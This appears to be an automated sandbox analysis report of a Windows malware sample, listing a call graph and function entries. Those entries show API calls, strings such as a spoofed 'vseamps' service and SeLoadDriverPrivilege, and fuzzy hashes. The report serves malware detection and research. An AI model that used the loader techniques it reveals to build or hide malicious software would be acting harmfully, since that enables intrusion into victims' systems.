14356->14338 14357->14353 14359 14000c9f4 GetLastError 14357->14359 14358->14356 14359->14356 14360 14000cab0 WriteFile 14361 14000caf6 GetLastError 14360->14361 14360->14362 14361->14356 14361->14362 14362->14355 14362->14356 14362->14360 14363 14000fd50 7 API calls 14363->14368 14364 14000c649 WideCharToMultiByte 14364->14356 14365 14000c68c WriteFile 14364->14365 14366 14000c80d GetLastError 14365->14366 14365->14368 14366->14356 14367 14000c829 GetLastError 14367->14356 14368->14356 14368->14363 14368->14364 14368->14367 14369 14000c6e2 WriteFile 14368->14369 14371 14000c81b GetLastError 14368->14371 14369->14368 14370 14000c7ff GetLastError 14369->14370 14370->14356 14371->14356 14374 14000b41e 14373->14374 14375 14000b42f EnterCriticalSection 14373->14375 14379 14000b2f0 14374->14379 14377 14000b423 14377->14375 14378 1400084e0 12 API calls 14377->14378 14378->14375 14380 14000b317 14379->14380 14381 14000b32e 14379->14381 14382 140009540 12 API calls 14380->14382 14383 140008300 17 API calls 14381->14383 14387 14000b342 14381->14387 14384 14000b31c 14382->14384 14385 14000b350 14383->14385 14386 140009300 10 API calls 14384->14386 14385->14387 14390 14000b400 22 API calls 14385->14390 14388 14000b324 14386->14388 14387->14377 14389 140008510 GetModuleHandleA GetProcAddress ExitProcess 14388->14389 14389->14381 14391 14000b371 14390->14391 14392 14000b3a7 14391->14392 14393 14000b379 14391->14393 14394 140008de0 HeapFree GetLastError 14392->14394 14395 14000edc0 LdrLoadDll GetModuleHandleA GetProcAddress 14393->14395 14399 14000b392 14394->14399 14396 14000b386 14395->14396 14398 140008de0 HeapFree GetLastError 14396->14398 14396->14399 14397 14000b3b0 LeaveCriticalSection 14397->14387 14398->14399 14399->14397 14401 14000c20c 14400->14401 14402 14000c212 14401->14402 14403 14000c22c SetFilePointer 14401->14403 14402->14343 14404 14000c24a GetLastError 14403->14404 14405 14000c254 14403->14405 14404->14405 14405->14343 13972 140006c95 13974 140006d7b 13972->13974 13975 140006d9d 13972->13975 13973 140006f95 NtAllocateVirtualMemory 13973->13975 13974->13973 13974->13975 14407 1400054e0 14408 14000552c 14407->14408 14412 140005506 14407->14412 14420 1400074d0 14408->14420 14411 140008370 3 API calls 14413 140005545 14411->14413 14414 1400055b8 14413->14414 14424 1400074f0 14413->14424 14415 140008de0 2 API calls 14414->14415 14416 1400055c0 14415->14416 14416->14412 14419 1400055b0 GetLastError 14419->14414 14422 140007333 14420->14422 14421 140005536 14421->14411 14422->14421 14423 1400073e0 LdrLoadDll 14422->14423 14423->14422 14426 140007333 14424->14426 14425 140005561 CreateThread 14425->14416 14425->14419 14426->14425 14427 1400073e0 LdrLoadDll 14426->14427 14427->14426

                                                                          Executed Functions

                                                                          Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 25 140006c95-140006d75 26 1400075a3-1400075af 25->26 27 140006d7b-140006d9b 25->27 28 140006da2-140006dbc 27->28 29 140006d9d 27->29 30 140006dc3-140006ded 28->30 31 140006dbe 28->31 29->26 32 140006df4-140006e04 30->32 33 140006def 30->33 31->26 34 140006e06 32->34 35 140006e0b-140006e19 32->35 33->26 34->26 36 140006e1b 35->36 37 140006e20-140006e2f 35->37 36->26 38 140006e31 37->38 39 140006e36-140006e4e 37->39 38->26 40 140006e5a-140006e67 39->40 41 140006e69-140006e94 40->41 42 140006e9d-140006ed0 40->42 44 140006e96 41->44 45 140006e9b 41->45 43 140006edc-140006ee9 42->43 47 140006f89-140006f8e 43->47 48 140006eef-140006f23 43->48 44->26 45->40 51 140006f95-140006fd6 NtAllocateVirtualMemory 47->51 52 140006f90 47->52 49 140006f25-140006f2d 48->49 50 140006f2f-140006f33 48->50 53 140006f37-140006f7a 49->53 50->53 51->26 54 140006fdc-140007020 51->54 52->26 55 140006f84 53->55 56 140006f7c-140006f80 53->56 57 14000702c-140007037 54->57 55->43 56->55 58 140007039-140007058 57->58 59 14000705a-140007062 57->59 58->57 62 14000706e-14000707b 59->62 63 140007081-140007094 62->63 64 140007148-14000715e 62->64 65 140007096-1400070a9 63->65 66 1400070ab 63->66 67 1400072e2-1400072eb 64->67 68 140007164-14000717a 64->68 65->66 69 1400070ad-1400070db 65->69 70 140007064-14000706a 66->70 68->67 71 1400070ea-140007101 69->71 70->62 72 140007143 71->72 73 140007103-140007141 71->73 72->70 73->71
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@
                                                                          • API String ID: 0-149943524
                                                                          • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                                          • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                                                          • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                                          • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00
                                                                          Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 90 1400073e0-1400073e9 LdrLoadDll 91 1400073f8-140007401 90->91 92 140007403 91->92 93 140007408-14000742e 91->93 94 1400075a3-1400075af 92->94 96 140007435-140007462 93->96 97 140007430 93->97 98 140007464-14000747e 96->98 99 1400074b6-1400074e9 96->99 100 140007559-140007567 97->100 101 1400074b4 98->101 102 140007480-1400074b3 98->102 104 1400074eb-14000752b 99->104 105 14000752c-140007535 99->105 106 140007341-1400073de 100->106 107 14000756c-1400075a2 100->107 101->105 102->101 104->105 108 140007552 105->108 109 140007537-140007554 105->109 106->90 107->94 108->94 109->100
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                                          • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                                                          • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                                          • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00
                                                                          Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: File$CreateReadmalloc
                                                                          • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                                                          • API String ID: 3950102678-3381721293
                                                                          • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                                          • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                                                          • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                                          • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22
                                                                          Function 00007FFAADBE1720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318305230.00007FFAADBE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFAADBE0000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318275672.00007FFAADBE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318347820.00007FFAADBF2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318385065.00007FFAADBFD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318420036.00007FFAADBFF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffaadbe0000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Free$ConsoleFileFindFirstLibrary
                                                                          • String ID: WordpadFilter.db
                                                                          • API String ID: 3189445314-3647581008
                                                                          • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                                          • Instruction ID: 9f4d7b53d90833128b8597b87d000209fbb4aa4e8f74fdefbf0339d434c758a7
                                                                          • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                                          • Instruction Fuzzy Hash: 11316B32B16B41C9E700CFB1D8502AD73A5EB89788F148639EE9C53B54EF38D556C380

                                                                          Non-executed Functions

                                                                          Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 3526400053-0
                                                                          • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                                          • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                                                          • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                                          • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                                                          Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                                                          • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                                                          • API String ID: 3408796845-4213300970
                                                                          • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                                          • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                                                          • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                                          • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                                                          Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                                                          • String ID: ampStopSingletone: logging ended
                                                                          • API String ID: 2048888615-3533855269
                                                                          • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                                          • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                                                          • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                                          • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                                                          Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                                          • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                                                          • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                                          • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                                                          Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastManagerOpen$FileModuleName
                                                                          • String ID: /remove$/service$vseamps
                                                                          • API String ID: 67513587-3839141145
                                                                          • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                                          • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                                                          • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                                          • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                                                          Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                                                          • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                                                          • GetProcAddress.KERNEL32 ref: 000000014000F117
                                                                            • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$Load$Library
                                                                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                          • API String ID: 3981747205-232180764
                                                                          • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                                          • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                                                          • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                                          • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                                                          Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                                                          • String ID:
                                                                          • API String ID: 4284112124-0
                                                                          • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                                          • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                                                          • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                                          • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                                                          Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                                                          • String ID: vseamps
                                                                          • API String ID: 3693165506-3944098904
                                                                          • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                                          • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                                                          • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                                          • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                                                          Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: FileModuleName
                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                          • API String ID: 514040917-4022980321
                                                                          • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                                          • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                                                          • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                                          • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                                                          Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                                                          • String ID:
                                                                          • API String ID: 2057259594-0
                                                                          • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                                          • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                                                          • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                                          • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                                                          Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.36318129477.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000002.00000002.36318099125.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318210608.000000014001A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000002.00000002.36318241570.000000014001E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_140000000_ieiUC1.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                                                          • String ID:
                                                                          • API String ID: 3103264659-0
                                                                          • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                                          • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                                                          • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                                          • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                                                          Function 00007FFAADBE2630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
